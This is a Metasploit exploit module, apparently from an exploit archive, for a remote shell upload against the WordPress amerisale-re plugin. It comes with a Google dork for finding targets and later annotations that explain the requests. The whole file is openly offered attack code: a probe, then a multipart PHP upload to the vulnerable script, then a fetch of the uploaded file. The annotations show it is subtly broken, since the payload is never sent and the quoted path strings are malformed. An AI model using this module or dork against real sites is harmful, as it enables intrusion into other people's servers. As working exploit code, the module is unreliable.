# Exploit Title : Wordpress amerisale-re Remote Shell Upload
# Exploit Author : T3rm!nat0r5
# Vendor Homepage : http://wordpress.org/
# Google Dork : inurl:/wp-content/plugins/amerisale-re
# Date : 2014/01/30
# Tested on : Windows 8 , Linux
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
# What this module does, as written below:
#   1. check   - one GET to the path built from the Target and PLUGIN options;
#                any HTTP 200 is reported as Detected.
#   2. exploit - one multipart POST to the same path carrying a single part
#                named "Filedata" with a random six-character alphanumeric
#                ".php" filename and an empty body, then one GET for that
#                filename under the UDP option path.
# Observable on the server side: the two/three requests above, the "Filedata"
# multipart field, and a response body the module expects to contain
# {"raw_file_name":"<word>", for the upload to count as successful.
require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and user-settable options.
  #
  # Options (all required, all default to "/"):
  #   Target - WordPress base path that every request URI is prefixed with.
  #   PLUGIN - path of the plugin script the GET probe and the upload POST go to.
  #   UDP    - path the uploaded file is fetched from in the final GET
  #            (described as "File Upload Path"; presumably the directory the
  #            plugin writes uploads into — confirm against the plugin).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Wordpress amerisale-re Plugin Remote Shell Upload',
      'Description' => %q{ This module exploits an arbitrary PHP File Upload and Code Execution flaw in some WordPress blog software plugins. The vulnerability allows for arbitrary file upload and remote code execution POST Data to Vulnerable Script/File in the plugin. },
      'Author' => [ 'T3rm!nat0r5 [Forever]' ],
      'Privileged' => false,
      # No NOP sled and a very large Space; note that nothing in #exploit below
      # actually references `payload`.
      'Payload' => { 'DisableNops' => true, 'Space' => 999999 },
      'Platform' => 'PHP',
      'Arch' => ARCH_PHP,
      'Targets' => [[ 'Automatic', { }]],
      'DefaultTarget' => 0,
    ))

    register_options(
      [
        OptString.new('Target', [true, "Wordpress Path", "/"]),
        OptString.new('PLUGIN', [true, "Full path of Plugin and Vulnerable File", "/"]),
        OptString.new('UDP', [true, "File Upload Path", "/"])
      ], self.class)
  end

  # Presence probe only: a single GET and a status-code test.
  #
  # @return [Exploit::CheckCode] Detected when the response is HTTP 200,
  #   Safe otherwise (including no response). A 200 here says nothing about
  #   the plugin version or whether the upload path is actually writable, so
  #   Detected is the weakest positive result the framework offers.
  def check
    uri = datastore['Target']
    plug = datastore['PLUGIN']

    # The single quotes inside the interpolated string are literal characters,
    # so the request path sent is <Target>'/'<PLUGIN>, not <Target>/<PLUGIN>.
    # The same construction is used for every request in #exploit.
    res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}'/'#{plug}" })

    if res and res.code == 200
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Upload step followed by a retrieval step.
  #
  # The upload is a multipart POST with exactly one part, field name
  # "Filedata", a random six-character alphanumeric filename ending in ".php",
  # and an empty part body. Success is judged solely by HTTP 200 plus a body
  # matching {"raw_file_name":"<word>", ; the captured word is then fetched
  # under the UDP path. Status output goes through print_status/print_good/
  # print_error; the method returns early if the upload check fails.
  def exploit
    uri = datastore['Target']
    plug = datastore['PLUGIN']
    path = datastore['UDP']
    peer = "#{rhost}:#{rport}"

    # Single multipart part: content is the empty string "", type
    # application/octet-stream, no transfer encoding, form-data disposition.
    post_data = Rex::MIME::Message.new
    post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")

    print_status("#{peer} - Sending payload")

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{uri}'/'#{plug}",
      'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
      'data' => post_data.to_s
    })

    # Low-precedence `not`/`or` keywords; evaluated left to right, so res is
    # nil-checked before .code and .body are touched. The regex requires the
    # server to echo the stored filename as raw_file_name in a JSON-style body.
    if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
      print_error("#{peer} - File wasn't uploaded, aborting!")
      return
    end

    # $1 is the global last-match capture set by the `!~` test above; both uses
    # below are evaluated before the next request is sent, so they still refer
    # to that match.
    print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")

    res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}'/'#{path}'/'#{$1}.php" })

    # Only a non-200 response is reported; a missing response (nil) is silently
    # ignored here.
    if res and res.code != 200
      print_error("#{peer} - Server returned #{res.code.to_s}")
    end
  end
end
# Exploit by T3rm!nat0r5